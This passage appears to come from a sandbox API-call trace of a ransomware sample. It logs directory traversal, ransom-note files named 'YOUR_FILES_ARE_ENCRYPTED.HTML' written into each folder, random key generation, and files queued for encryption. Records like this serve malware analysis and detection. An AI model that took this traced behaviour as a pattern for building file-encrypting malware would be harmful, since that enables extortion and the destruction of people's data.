lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6da0d9db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6da0d9db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6da0d9db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="Windows", cAlternateFileName="")) returned 0 [0119.232] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.232] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.232] GetProcessHeap () returned 0x600000 [0119.232] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.239] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.240] CloseHandle (hObject=0x338) returned 1 [0119.242] GetProcessHeap () returned 0x600000 [0119.242] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.243] GetProcessHeap () returned 0x600000 [0119.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.243] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.243] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.243] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp") returned 96 [0119.243] GetProcessHeap () returned 0x600000 [0119.243] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.244] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp" [0119.244] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\*" [0119.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.245] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.245] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 0 [0119.245] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.245] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0119.245] GetProcessHeap () returned 0x600000 [0119.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.246] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.247] CloseHandle (hObject=0x338) returned 1 [0119.247] GetProcessHeap () returned 0x600000 [0119.247] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.247] GetProcessHeap () returned 0x600000 [0119.247] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.247] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60629330, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x60629330, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x60629330, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.247] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.247] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0119.247] GetProcessHeap () returned 0x600000 [0119.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.249] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.250] CloseHandle (hObject=0x214) returned 1 [0119.250] GetProcessHeap () returned 0x600000 [0119.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.250] GetProcessHeap () returned 0x600000 [0119.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.250] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xcb208e81, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xcb208e81, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.250] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.250] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData") returned 96 [0119.250] GetProcessHeap () returned 0x600000 [0119.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.250] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData" [0119.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\*" [0119.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xcb208e81, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xcb208e81, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.250] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xcb208e81, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xcb208e81, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.251] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb208e81, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb2850a5a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb2850a5a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="Indexed DB", cAlternateFileName="INDEXE~1")) returned 1 [0119.251] StrStrIW (lpFirst="Indexed DB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.251] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned 107 [0119.251] GetProcessHeap () returned 0x600000 [0119.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.251] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0119.251] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\*" [0119.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb208e81, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb2850a5a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb2850a5a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.251] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb208e81, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb2850a5a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb2850a5a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.251] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb27b58d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xcb27b58d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x80dab36c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0119.251] StrStrIW (lpFirst="edb.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.251] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk") returned 115 [0119.251] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0119.251] lstrlenW (lpString=".chk") returned 4 [0119.251] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0119.251] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb22efaa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xb6a6fabe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x90e58e77, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edb.log", cAlternateFileName="")) returned 1 [0119.251] StrStrIW (lpFirst="edb.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.251] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log") returned 115 [0119.251] PathFindExtensionW (pszPath="edb.log") returned=".log" [0119.251] lstrlenW (lpString=".log") returned 4 [0119.251] PathFindExtensionW (pszPath="edb.log") returned=".log" [0119.251] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.253] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0119.253] GetProcessHeap () returned 0x600000 [0119.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.256] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="CA") returned 2 [0119.256] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="58") returned 2 [0119.256] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="4E") returned 2 [0119.256] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="71") returned 2 [0119.256] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="FE") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="1C") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="22") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="EF") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="EE") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="5A") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="40") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="03") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="BE") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="CA") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="76") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="79") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3E") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="9F") returned 2 [0119.256] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="DB") returned 2 [0119.256] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="74") returned 2 [0119.256] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="CE") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="7D") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="49") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="DB") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="D7") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="72") returned 2 [0119.257] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="61") returned 2 [0119.257] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="8D") returned 2 [0119.257] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="1D") returned 2 [0119.257] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="9F") returned 2 [0119.257] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="B4") returned 2 [0119.257] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="67") returned 2 [0119.257] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log" [0119.257] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.257] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.259] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb22efaa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xaa55f5cb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb2228190, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x30f4030, dwReserved1=0x315d700, cFileName="edb00029.log", cAlternateFileName="")) returned 1 [0119.262] StrStrIW (lpFirst="edb00029.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.262] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log") returned 120 [0119.262] PathFindExtensionW (pszPath="edb00029.log") returned=".log" [0119.262] lstrlenW (lpString=".log") returned 4 [0119.262] PathFindExtensionW (pszPath="edb00029.log") returned=".log" [0119.262] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00029.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00029.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.263] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=524288) returned 1 [0119.263] GetProcessHeap () returned 0x600000 [0119.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.264] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="CA") returned 2 [0119.264] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="0F") returned 2 [0119.264] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="55") returned 2 [0119.264] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="E4") returned 2 [0119.264] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="0C") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="46") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="75") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="8F") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="1F") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="EF") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="52") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="AD") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="EA") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="B6") returned 2 [0119.264] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="62") returned 2 [0119.264] wsprintfW (in: 